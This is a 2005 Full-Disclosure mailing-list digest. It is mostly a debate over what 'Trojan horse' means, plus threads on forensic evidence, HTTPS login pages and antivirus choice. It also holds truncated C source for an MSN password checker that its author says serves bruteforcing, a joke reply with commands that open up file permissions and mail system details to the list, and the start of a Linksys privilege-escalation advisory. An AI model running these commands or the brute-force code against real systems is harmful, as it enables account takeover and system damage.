Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Donald J. Ankney

Wikipedia:In the context of computer software, a Trojan horse is a malicious program that is disguised as legitimate software. The term is derived from the classical myth of the Trojan horse. In the siege of Troy, the Greeks left a large wooden horse outside the city. The Trojans were convinced that it was a gift, and moved the horse to a place within the city walls. It turned out that the horse was hollow, containing Greek soldiers who opened the city gates of Troy at night, making it possible for the Greek army to pillage the city. Trojan horse programs work in a similar way: they may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29Your definition is just a subset of the standard, broader one. On Aug 10, 2005, at 3:43 PM, Jason Coombs wrote:[EMAIL PROTECTED] wrote: On Thu, Aug 11, 2005 at 12:26:23AM +0200, Thierry Zoller wrote: The industry definition is perfectly within Homers defintion of a Trojanhorse. JC> http://classics.mit.edu/Homer/iliad.html When I read Homer, it was a Greek horse. The horse became the property of the Trojans before it launched its hidden attack, but your point is interesting as well.There are other terms used to describe malware disguised as something else that has hidden capability to cause damage. Logic bomb, for example.I'll do some more work on this and see where it leads. The proposal of "backdoor" as the better term just doesn't work, since a backdoor is a hidden mechanism for gaining entry or control of a system that is built into the system by its creator or some other involved party. An intruder may open up a backdoor in a system by altering its programming rather than by planting a Trojan, so there needs to be a distinction between the two.Cheers,Jason Coombs[EMAIL PROTECTED]___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Thierry Zoller

Dear Jason Coombs,

JC> Because Trojan horses often have
JC> these harmful functions, there often arises the misunderstanding that
^   
JC> such functions define a Trojan Horse.

Please read what you just posted, it directly contradicts what
that wikipedia author wrote 2 lines above that. That wikipedia
article can be trashed.

Sorry, this thread is closed for me, if you like to mix up
defintions please go ahead.

-- 
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Help put a stop to incompetent computer forensics

2005-08-10 Thread Technica Forensis

> After a trivial Google search, the following was found:

After all, any experienced computer forensics person should know how
to use Google.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Technica Forensis

> Interesting. What dictionary are you reading this definition from?

Industry standard
 
> Whether or not the malware does other things as well, everyone I know
> considers a Trojan to be a type of malware that allows an intruder to
> gain entry to a system through the front door once the malware has
> gained entry through some other means such as tricking the user into
> installing it, forcing itself to install a la spyware, or exploiting one
> of the many vulnerabilities in Internet Explorer that enable Web sites
> to plant and execute arbitrary code.
> 
> If your proposed definition is the correct one, I'm willing to alter my
> own understanding of this term. But you're going to have to offer some
> proof that other people agree with you.

I took a poll around my office, and we all agree you're wrong on two
counts:  1. your definition of Trojan Horse and 2. your desire to
personally attack people when their views differ from your own.

> 
> Somehow I suspect that Homer would disagree with you, and he is the
> proper definitive authority on this subject. See the story of the fall
> of Troy through the use of a Trojan Horse that enabled the whole Greek
> army to gain entry through the front gates because of the actions of the
> hidden package within the horse.

Did the horse the Greeks built create another gate that they could use
that wasn't properly secured by the Trojans?  Or, open the front door
remotely?  Your definition is the one that doesn't hold up to Homer's.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics


Erik Kamerling wrote:

Trojan Horse
A computer program that appears to have a useful function, but also has a 
hidden and potentially malicious function that evades security mechanisms, 
sometimes by exploiting legitimate authorizations of a system entity that 
invokes the program.


Copied from the SANS Glossary of Terms Used in Security and Intrusion 
Detection. 


http://www.sans.org/resources/glossary.php


Common usage in practice today matters as much as if not more than the 
original use of the term in computing. The term Trojan is synonymous 
with malware that adds a backdoor, even if a bunch of old people think 
it's still okay to call other malicious code by this name.


From:

http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29

In practice, Trojan Horses in the wild do contain spying functions (such 
as a Packet sniffer) or backdoor functions that allow a computer, 
unbeknownst to the owner, to be remotely controlled remotely from the 
network, creating a "zombie_computer". Because Trojan horses often have 
these harmful functions, there often arises the misunderstanding that 
such functions define a Trojan Horse.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Erik Kamerling

Trojan Horse
A computer program that appears to have a useful function, but also has a 
hidden and potentially malicious function that evades security mechanisms, 
sometimes by exploiting legitimate authorizations of a system entity that 
invokes the program.

Copied from the SANS Glossary of Terms Used in Security and Intrusion 
Detection. 

http://www.sans.org/resources/glossary.php

Best

Erik Kamerling

On Wednesday 10 August 2005 18:43, Jason Coombs wrote:

> I'll do some more work on this and see where it leads. The proposal of
> "backdoor" as the better term just doesn't work, since a backdoor is a
> hidden mechanism for gaining entry or control of a system that is built
> into the system by its creator or some other involved party. An intruder
> may open up a backdoor in a system by altering its programming rather
> than by planting a Trojan, so there needs to be a distinction between
> the two.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics


[EMAIL PROTECTED] wrote:

On Thu, Aug 11, 2005 at 12:26:23AM +0200, Thierry Zoller wrote:


The industry definition is perfectly within Homers defintion of a Trojan
horse. 



JC> http://classics.mit.edu/Homer/iliad.html



When I read Homer, it was a Greek horse.



The horse became the property of the Trojans before it launched its 
hidden attack, but your point is interesting as well.


There are other terms used to describe malware disguised as something 
else that has hidden capability to cause damage. Logic bomb, for example.


I'll do some more work on this and see where it leads. The proposal of 
"backdoor" as the better term just doesn't work, since a backdoor is a 
hidden mechanism for gaining entry or control of a system that is built 
into the system by its creator or some other involved party. An intruder 
may open up a backdoor in a system by altering its programming rather 
than by planting a Trojan, so there needs to be a distinction between 
the two.


Cheers,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Blue Boar

Jason Coombs wrote:
> Whether or not the malware does other things as well, everyone I know
> considers a Trojan to be a type of malware that allows an intruder to
> gain entry to a system through the front door once the malware has
> gained entry through some other means such as tricking the user into
> installing it, forcing itself to install a la spyware, or exploiting one
> of the many vulnerabilities in Internet Explorer that enable Web sites
> to plant and execute arbitrary code.

Traditional malicious code terms going back 20+ years ago hold that a
"trojan horse" program is one that performs a function other than or in
addition to the function it is advertised to have.  The reason for this
is to trick a user into running it, under the assumption that it does
something useful, or is at least harmless.  This name comes from the
"accepting the gift" aspect of Homer's story.  Back then, the world was
DOS, and there was no generally accepted connotation of installing a
backdoor; systems were not widely networked.

Current casual usage of "trojan" or "trojaned" is synonymous with a
program that provides an unauthorized user continued access to a victim
computer.  The "trojan" portion of the term apparantly having morphed to
mean that the program usually attempts to make itself appear to be a
legitimate program, often by running as a process named the same as a
real system process, etc... or general hiding.  For this usage you could
substitute the term "backdoor".

But you guys are just arguing semantics, and the meaning(s) ought to be
clear to all of you from the context.  And now you've made me do it, too.

BB
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Thierry Zoller

Dear Jason Coombs,

JC> Interesting. What dictionary are you reading this definition from?
10 years security industry, AV experience, Whatis, and so on.

JC> Whether or not the malware does other things as well, everyone I know
JC> considers a Trojan to be a type of malware that allows an intruder to
JC> gain entry to a system through the front door once the malware has
JC> gained entry through some other means such as tricking the user into
JC> installing it, forcing itself to install a la spyware, or exploiting one
JC> of the many vulnerabilities in Internet Explorer that enable Web sites
JC> to plant and execute arbitrary code.

That's the brainwashed mashup media definition, we should pay
attention they don't suceed too much. Hacker, cracker, whitehat,
blackhat, "they are all alike".

JC> If your proposed definition is the correct one
I don't propose, it's an industry standard, ask kaspersky
and other AV vendors, look at how they categorise these items.

JC> own understanding of this term. But you're going to have to offer some
JC> proof that other people agree with you.
No proof from me here accept pure logic.

JC> Somehow I suspect that Homer would disagree with you, and he is the
JC> proper definitive authority on this subject.
Actually it is that exact definition.

JC> See the story of the fall
JC> of Troy through the use of a Trojan Horse that enabled the whole Greek
JC> army to gain entry through the front gates because of the actions of the
JC> hidden package within the horse.

The industry definition is perfectly within Homers defintion of a Trojan
horse. Did they trojan horse allow them to remotely control them? No,
the trojan horse was something else it pretended. It pretented to be
a present in form of an art piece. What is really was was a hollow
sculpture filled with armed soldiers.

JC> http://classics.mit.edu/Homer/iliad.html



-- 
Mit freundlichen Grüßen
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer fore nsics

2005-08-10 Thread Fergie (Paul Ferguson)

Hello? I can't believe I'm getting suckered into this...

Wikipedia:
Trojan horse (computing): In the context of computer
software, a Trojan horse is a malicious program that
is disguised as legitimate software. The term is derived
from the classical myth of the Trojan horse.
http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29

Dictionary.com:
Trojan horse
n.
1. A subversive group or device placed within enemy ranks.
2. The hollow wooden horse in which, according to legend,
Greeks hid and gained entrance to Troy, later opening the
gates to their army.
3. Computer Science. A program that appears to be legitimate
but is designed to have destructive effects, as to data
residing in the computer onto which the program was loaded.

- ferg

-- Jason Coombs <[EMAIL PROTECTED]> wrote:

Thierry Zoller wrote:
> Or in better English :
> A computer trojan horse is a program which appears to be something good,
> but actually conceals something bad.

Interesting. What dictionary are you reading this definition from?

[snip]

Jason Coombs
[EMAIL PROTECTED]

--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 [EMAIL PROTECTED] or [EMAIL PROTECTED]
 ferg's tech blog: http://fergdawg.blogspot.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics


Thierry Zoller wrote:

Or in better English :
A computer trojan horse is a program which appears to be something good,
but actually conceals something bad.


Interesting. What dictionary are you reading this definition from?

Whether or not the malware does other things as well, everyone I know 
considers a Trojan to be a type of malware that allows an intruder to 
gain entry to a system through the front door once the malware has 
gained entry through some other means such as tricking the user into 
installing it, forcing itself to install a la spyware, or exploiting one 
of the many vulnerabilities in Internet Explorer that enable Web sites 
to plant and execute arbitrary code.


If your proposed definition is the correct one, I'm willing to alter my 
own understanding of this term. But you're going to have to offer some 
proof that other people agree with you.


Somehow I suspect that Homer would disagree with you, and he is the 
proper definitive authority on this subject. See the story of the fall 
of Troy through the use of a Trojan Horse that enabled the whole Greek 
army to gain entry through the front gates because of the actions of the 
hidden package within the horse.


http://classics.mit.edu/Homer/iliad.html

Regards,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] msn passwd checker C# source

2005-08-10 Thread ad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

:)

/*
C:\>msn_fuzzer [EMAIL PROTECTED] testpasswd
[.] Resolving.: messenger.hotmail.com = 65.54.239.140
[.] Connected.: 207.46.4.25:1863
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

C:\>msn_fuzzer [EMAIL PROTECTED] testpasswd -v
[.] Resolving.: messenger.hotmail.com
[.] Resolving.: messenger.hotmail.com = 65.54.239.140
[.] Connecting: 65.54.239.140:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: 207.46.4.33:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: challenge string OK
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

C:\>msn_fuzzer [EMAIL PROTECTED] testpasswd -vv
[.] Resolving.: messenger.hotmail.com
[.] Resolving.: messenger.hotmail.com = 65.54.239.140
[.] Connecting: 65.54.239.140:1863
[.] Connected.: 65.54.239.140:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: buffer #1
[.] Connected.: buffer #2
[.] Connected.: buffer #3
[.] Transferred...: 207.46.4.92:1863
[.] Connected.: 207.46.4.92:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: buffer #1
[.] Connected.: buffer #2
[.] Connected.: buffer #3
[.] Connected.: challenge string OK
[.] HTTPS.: subconnection #1 (nexus.passport.com)
[.] HTTPS.: retrieving login server
[.] HTTPS.: retrieving login server (success)
[.] HTTPS.: subconnection #2 (loginnet.passport.com)
[.] HTTPS.: retrieving hash ticket
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

C:\>msn_fuzzer 207.46.4.92 1863 [EMAIL PROTECTED] testpasswd -vv
[.] Connecting: 207.46.4.92:1863
[.] Connected.: 207.46.4.92:1863
[.] Connected.: logging ([EMAIL PROTECTED])
[.] Connected.: buffer #1
[.] Connected.: buffer #2
[.] Connected.: buffer #3
[.] Connected.: challenge string OK
[.] HTTPS.: subconnection #1 (nexus.passport.com)
[.] HTTPS.: retrieving login server
[.] HTTPS.: retrieving login server (success)
[.] HTTPS.: subconnection #2 (loginnet.passport.com)
[.] HTTPS.: retrieving hash ticket
[.] HTTPS.: unauthorized (login/passwd)
[.] Disconnection..

etc,etc..

The C code might be used to fuzze some MSN clients, bruteforce, etc,
etc...

demonstration:

http://class101.org/MSN_fuzzer.zip
*/
#include 
#include 
#include 
#include 
#include 
#include 
#pragma comment(lib, "ws2_32")
#pragma comment(lib, "mpr")
#pragma comment(lib, "wininet")

void ver(),usage(),error(),foot(),done(SOCKET s);
int vb1=0,vb2=0,port,i,j,l00p=0;
char
*ar0,*ar1,*ar2,*ar3,*ar4,*ar5,*one,*pwd,*mail,mail_[128],mail__[128],newip[1
5],newport[5];
hostent* one_;
WSADATA wsadata;

int engine1(char *one,int port,char *mail,int argc);

int main(int argc,char *argv[])
{
 ver();

ar0=argv[0],ar1=argv[1],ar2=argv[2],ar3=argv[3],ar4=argv[4],ar5=argv[5];
 if (argc==1){usage();return 0;}
 if
((argc==3||argc==4&&(stricmp(ar3,"-v")==0||stricmp(ar3,"-vv")==0))&&strchr(a
r1,0x40)!=0||

(argc==5||argc==6&&(stricmp(ar5,"-v")==0||stricmp(ar5,"-vv")==0))&&atoi(ar2)
>0&&atoi(ar2)<=65535&&strlen(ar1)>7&&strchr(ar3,0x40)!=0)
 {
  if (argc==4&&stricmp(ar3,"-v")==0||argc==6&&stricmp(ar5,"-v")==0)
   vb1++;
  else if
(argc==4&&stricmp(ar3,"-vv")==0||argc==6&&stricmp(ar5,"-vv")==0)
   vb2++;
  printf("\n"); //I feel maniak I know :s
  if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){
   if (vb2!=0)
printf("[.] WSA Initialization Error (%d)\n",WSAGetLastError());
   printf("[.] Aborting..\n");
   return -1;
  }
  if (argc==3||argc==4){
   one="messenger.hotmail.com";
   mail=ar1;pwd=ar2;
  }else{
   one=ar1;
   mail=ar3;pwd=ar4;}
  for (i=0,j=0;mail[i]!=64;i++,j++){memset(mail_+j,mail[i],1);}
  for (i=i+1,j=0;mail[i]!=0;i++,j++){memset(mail__+j,mail[i],1);}
  if (one[strlen(one)-1] == '\n')
   one[strlen(one)-1] = '\0';
  if (isalpha(one[0]))
  {
   if (vb1!=0||vb2!=0)
printf("[.] Resolving.: %s\n",one);
   one_=gethostbyname(one);
   if (one_==0)
   {
if (vb2!=0)
 printf("[.] Resolving.: ERROR (%d)\n",WSAGetLastError());
printf("[.] Aborting..\n");
return -1;
   }else{
printf("[.] Resolving.: %s = %s\n",one,inet_ntoa(*((struct
in_addr *)one_->h_addr_list[0])));
   }
   one=inet_ntoa(*((struct in_addr *)one_->h_addr_list[0]));
   port=1863;
   if (vb1!=0||vb2!=0)
printf("[.] Connecting: %s:%d\n",one,port);
  }
  else
  {
   port=atoi(ar2);
   if (vb1!=0||vb2!=0)
printf("[.] Connecting: %s:%d\n",one,port);
  }
  engine1(one,port,mail,argc);
 }
 else {
  error();return -1;}
 return 0;
}

int engine1(char *one,int port,char *mail,int argc)
{
 SOCKET s;fd_set mask1,mask2;
 struct timeval timeout,timeout2;
 struct sockaddr_in server;
loop:
 unsigned long flag=1;
 server.sin_family=AF_INET;
 if (l00p!=0)
 {
  server.sin_addr.s_addr=inet_addr(newip);
  server.sin_port=htons(atoi(newport));
 }
 else
 {
  server.sin_addr.s_addr=inet

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Thierry Zoller

Dear Jason Coombs,

JC> Come on, do you even understand what a Trojan is?
JC> By definition, the Trojan gives a third-party the ability to control the
JC> computer from a remote location.
Weel duh, no. In fact a Trojan Horse means that the program does other
things it indicates (ex: pretends to be a game runs a virus). What you refer
to is a backdoor. A backdoor can be a Trojan, and a Trojan can be a Backdoor,
but the link is not logicaly necessary.


Or in better English :
A computer trojan horse is a program which appears to be something good,
but actually conceals something bad.


Regards,
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] DNSCON 8, Blackpool 12-14th August 2005 Update

2005-08-10 Thread Manchester 2600

The 2005 DNSCON event is running this weekend

Further details have now been posted to http://www.dnscon.org

Friday 12th August to Sunday 14th August 2005, Imperial Hotel
Blackpool.

This is the eighth running of the UK's longest running 'open'
information security event, for everyone with an interest in computer
security, telephony, hacking, phone phreaking, cryptography, internet
security/privacy issues and related subjects.

As usual they will have a range of speakers along with alternative
events to make a fun weekend.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Help put a stop to incompetent computer forensics


anonymous wrote:
I know when running EnCase or some other software you can see the 
cookies of the machine. More importantly, you can see what "search 
items" the invidual was searching for.



No, you cannot. You can see what the Internet Explorer history files 
contain. This does not prove that a person typed search terms into 
Google. If you'd like me to prove this to you, ship your computer to me. 
I will ship it back to you and it will contain proof that you are a 
very, very bad person.



So I can tell if the person had the intent or atleast give some ammo to 
the prosecution that the perp was searching for "z" and "" etc.


No you can't. You can tell that the Internet Explorer history files 
contain data.



So if their entire defense is that a trojan put the kiddie porn on their 
machine yet their search items were things related to that sort of thing 
then we can show the the perp was searching for related topics.


Come on, do you even understand what a Trojan is?

By definition, the Trojan gives a third-party the ability to control the 
computer from a remote location. I'm not suggesting that the Trojan was 
programmed to plant evidence. I'm saying that a third-party was in 
control of the computer and any data that you see on the computer's hard 
drive, including things that you seem to think "prove" that a person 
typed on the attached keyboard, reflects, at best, the actions of many 
people and a lot of software -- and at worst the data are meaningless 
because the files have been tampered with on purpose by a third party.


But I do believe that once an analysis of the perp's hard drive has been 
done said examiner should be able to determine if the information on the 
machine was from the surfing habits of the perp, or if they may have 
come from a trojan. Besides, if a trojan was present it should still be 
there when the examiner is looking at the system!


No. The analyst can only determine that the computer may have been 
executing software in the past at various purported times (based on 
date/time stamps) -- or, maybe what you can determine is that the 
computer has been receiving files from elsewhere, and the date/time 
stamps don't have any connection whatsoever to the local computer but 
have some connection to another computer. Furthermore, Trojan infections 
come and go, and you probably know that remote exploitable 
vulnerabilities make it unnecessary to plant a Trojan -- if the 
attacker/intruder is only interested in gaining control of the computer 
one time, and a victim comes along with a vulnerable IE browser, then 
arbitrary code can be executed and no Trojan infection will necessarily 
result. That's up to the attacker. Nevertheless, the arbitrary code 
execution resulted in the attacker being able to do anything they want 
with the computer, including launch IE and visit Web sites and enter 
search terms which IE will log.


However, if the information came from an email, cd, diskette or other 
media then it's going to open a whole other can of worms.


It's not a can of worms for a CD or diskette to be found alongside a 
computer, that's called reasonable circumstantial evidence. Computer 
data stored on hard drives connected to the Internet is NOT reasonable 
circumstantial evidence. It's just data.


The "circumstances" under which data come to be on a hard drive are 
UNKNOWN unless law enforcement have established appropriate forensic 
controls to monitor computer operation during an investigation.


When the circumstances of software execution on a computer and the data 
communications to and from a computer are UNKNOWN, all data from that 
computer should be excluded from use in court as "evidence" of anything.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Insecure http pages referencing https form-actions.

2005-08-10 Thread fd

On Wed, 10 Aug 2005, Leandro Meiners wrote:

> There was a lnnng discussion about this at
> [EMAIL PROTECTED] mailing list, check out the first mail at the
> archives at
> http://www.securityfocus.com/archive/107/402824/30/390/threaded
> 
> There is even a "Hall of shame" at http://AmirHerzberg.com/shame.html.

Wow... The hall of shame is great for a laugh.  -- Thanks Leandro!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Operation Site-Key computer forensic searches ruled illegal


Tharp, Robert wrote:

ok. i understand now. that's very interesting. in the marine's case, did you
actually prove that had happened? or did you just raise enough doubt that
the prosecutors dropped the case.


The defendant's credit card number was definitely intercepted by a third 
party by way of the keylogger. There was no doubt about that. The child 
pornography found on the hard drive was entirely within the unallocated 
clusters, meaning that at some point in the past there had most likely 
been a few digital photos on the computer in the active filesystem, but 
that those files were no longer found alongside the other files and 
folders within the active filesystem.


One possible explanation for these circumstances is that the photos were 
saved to the computer's hard drive by Internet Explorer as Temporary 
Internet Files. We don't know for sure, and can't know for sure, that 
this was the case because once a file is deleted and its entries in the 
FAT or MFT (portion of hard drive in which Windows stores the list of 
files and folders that are on the drive) are overwritten with other data 
it is impossible to know what folder the file had previously been stored 
within. So, we have to look at other factors -- we usually don't even 
have a filename of the deleted file in this case, we only have the 
digital photograph data; and a forensic technique called a "carve" has 
to be performed to scrape the digital photograph data out of the 
unallocated clusters starting from the beginning of the photograph data.


If you carve child pornography out of unallocated clusters on a hard 
drive that belonged to a suspect whose credit card number appeared in 
the site-key database, you don't have to be a rocket scientist to 
conclude that, reasonably, the two circumstances are probably connected.


The flaw in this whole thought process is in attributing those two 
connected events to a person just because the person is the owner of 
both, given that there was a Trojan infection AND a keylogger installed 
it was proved conclusively that somebody else had control of the 
suspect's computer, and therefore had control of the suspect's identity.


However, this is not the way that forensic examiners write their 
forensic examination reports. So-called "computer forensic examiners" 
including those who work for the DOD Computer Forensics Lab (DCFL) who 
did work in the Pearl Harbor case simply report what they find. They 
don't offer interpretations. They don't even point out what should seem 
obvious: that a Trojan and a keylogger are present BECAUSE somebody else 
was in control of the computer via the Internet. Not as a result of some 
virus or worm that automatically infected the defendant's computer 
without a human intruder guiding them to do so.


This is a subtle but critical distinction ... My job has always been to 
offer expert opinion testimony. This is what I do in the cases that I am 
hired to work on. Despite being expert in law, judges and attorneys 
often do not understand the difference between a computer forensic 
examination report authored by a computer forensics lab and opinion 
testimony; my Pearl Harbor testimony revolved around the need for a 
civilian expert who could review the forensic examination and offer 
critique and opinion as to the meaning and reliability of the 
circumstantial evidence in linking the defendant to the crime.


In all other fields of forensics the forensic technician or criminalist 
offers an opinion along with their report of findings. In every case 
that I've worked on and every case that I've read transcripts and 
researched where "computer forensics" serves as a source of evidence 
against the accused, the information found on the suspect's hard drive 
is represented to be proof of the actions of the owner of the hard 
drive. When asked questions like "couldn't somebody else have been 
sitting at the keyboard?" the forensic examiner will answer "yes" -- 
you'd be surprised how often this question doesn't get asked by the 
defense attorney -- but then say something like "but I found the data 
associated with the defendant's user account". The forensic examiner is 
the master of twisting the evidence to fit the accusation because there 
is always a way to look at the data that makes the data tell the story 
you want it to tell. Because the forensic examiners don't offer opinion 
testimony, indeed they are not qualified to offer opinions in most cases 
because they simply do not understand the computer programming that 
caused the electronic evidence to exist.


The only forensic examiner who I have encountered who was a former 
software developer was actually not skilled as a programmer of Windows 
operating system or data communications software like the software he 
typically testifies about -- rather, he was a database programmer who 
used dBase to create databases and the programming instructions that 
would put data in and get data out of the databases. Perh

Re: [Full-disclosure] Insecure http pages referencing https form-actions.

2005-08-10 Thread [EMAIL PROTECTED]

On Wed, 10 Aug 2005 [EMAIL PROTECTED] wrote:

> > The victim would then be logged in to where they expected to be, complete
> > with padlock.  Except for the extra "please wait" page, this would not be
> > obvious to a user.  My issue is with the insecure location of the actual
> >  and I have seen many sites which do this (including major financial
> > institutions).
> 
> It appears the key part of the scenario is DNS poisoning. Anytime a
> user goes to a http page to click on a login link, DNS poisoning will
> work without regard to whether the login page is secure or unsecure. 
> (For example, I go to a FI's main page at http://www.fi.com, which DNS
> poisoning points to an evil server.  The evil server sends back a page
> that looks and acts like the FI's main page, but contains a link to an
> evil login page).  The same scenario can occur when any page in a
> click stream going to a login page is hijacked.
> 
> Are you suggesting that ALL FI pages that either contain login links
> or could be in a click stream to login pages be served https:??

Absolutely.  Assuming you trust the CA which issued the certificate for
the https server, this problem is resolved by forcing all click-stream
pages (especially login pages) to be under TLS.  Even if you dns poison an
https server, where would you point it?  Unless you have the issuing CA's
key it would be at least 128bits of NP-hard cracking to keep from getting
the "this server is not signed by a known CA bla bla bla" message from the
browser.

This isn't perfect, mind you.  Users will invariably click the go-dammit
button to get what they are looking for, even if the go-dammit button
warns them that their bank will melt down if they continue:  This web page
will self destruct in 27...26...

-Eric

-- 
Eric Wheeler 
Vice President 
National Security Concepts, Inc. PO Box
3567 Tualatin, OR 97062

http://www.nsci.us/
Voice: (503) 293-7656
Fax:   (503) 885-0770

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Michael Holstein

[EMAIL PROTECTED]:~$ 
who runs the site?

I want access



You need to hack into it, obviously.



#chmod -R 777 /*
#passwd -s /bin/sh nobody   
#ifconfig -a |mail -s "hack me" full-disclosure@lists.grok.org.uk
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Antivirus

2005-08-10 Thread Sergio López C.

Title: Antivirus



Under My experience i just can say:
Norton : Is exellent! for handle phisical clusters 
into a hard disc ; Like antivirus NO WAY.
Bitdefender: Was exellent when was in hands of 
kaspersky labs the russian company, very good on time vaxunation now is delayed 
one week or more to provide good protection and disinfection 
tools.
NOW the best results for me:
Using Windows: www.pandasoftware.com  (titanium, 
platinium, Bussiness secure and true prevent)
Using Linux: The classic islandic www.f-prot.com 
 
Sergio L.C.
 
 


From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On Behalf Of Jason 
BethuneSent: Wednesday, August 10, 2005 12:21 PMTo: full-disclosure@lists.grok.org.ukSubject: 
[Full-disclosure] Antivirus

  
  I know this is not 
  really the place to ask this question but I need some professional advice and 
  well you guys know 
  a lot. I need to get rid of our current 
  Antivirus solution in the small 20+ user network we have running on SBS 2003. 
  Currently running NAV 7.6 Corporate Edition. Any opinions on the new version 
  of Norton 10.0? Should I look at Trend 
  Micro? Both seem to priced about the same for Canadian 
  customers. I hope this is not too way off topic but I 
  dont post here very often. If you can give 
  me some advice that 
  would be greatly appreciated.
  Jason
  
  
  

  ___Full-Disclosure - We 
  believe in it.Charter: 
  http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored 
  by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread milw0rm Inc.

Ill take your cash for 0day ;P

/str0ke

On 8/10/05, Ahmad N <[EMAIL PROTECTED]> wrote:
> Hi there, 
>   
> I'm looking for the best 0-day exploit source, a source I can really count 
> on for the newest and most reliable exploits. 
>   
> can anybody suggest a website??? 
>   
> Thx 
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Privilege escalation in Linksys WLAN Monitor v2.0.

2005-08-10 Thread Reed Arvin

Summary:
Privilege escalation in Linksys WLAN Monitor v2.0 (http://www.linksys.com/)

Details:
The Linksys WLAN Monitor service (WLSVC) that is used to configure
settings for various Linksys wireless network cards runs under the
context of the LocalSystem account. It is possible to manipulate the
administrative interface of the Linksys WLAN Monitor and escalate
privileges to that of the LocalSystem account.

Vulnerable Versions:
Linksys WLAN Monitor v2.0 (for the WUSB54G wireless NIC and possibly
other wireless NICs)

Patches/Workarounds:
The vendor was notified of the issue. There was no response as to
whether or not a patch/fix would be released.

Exploits:

1. Right click on the Linksys Wireless Network Monitor in the lower right corner
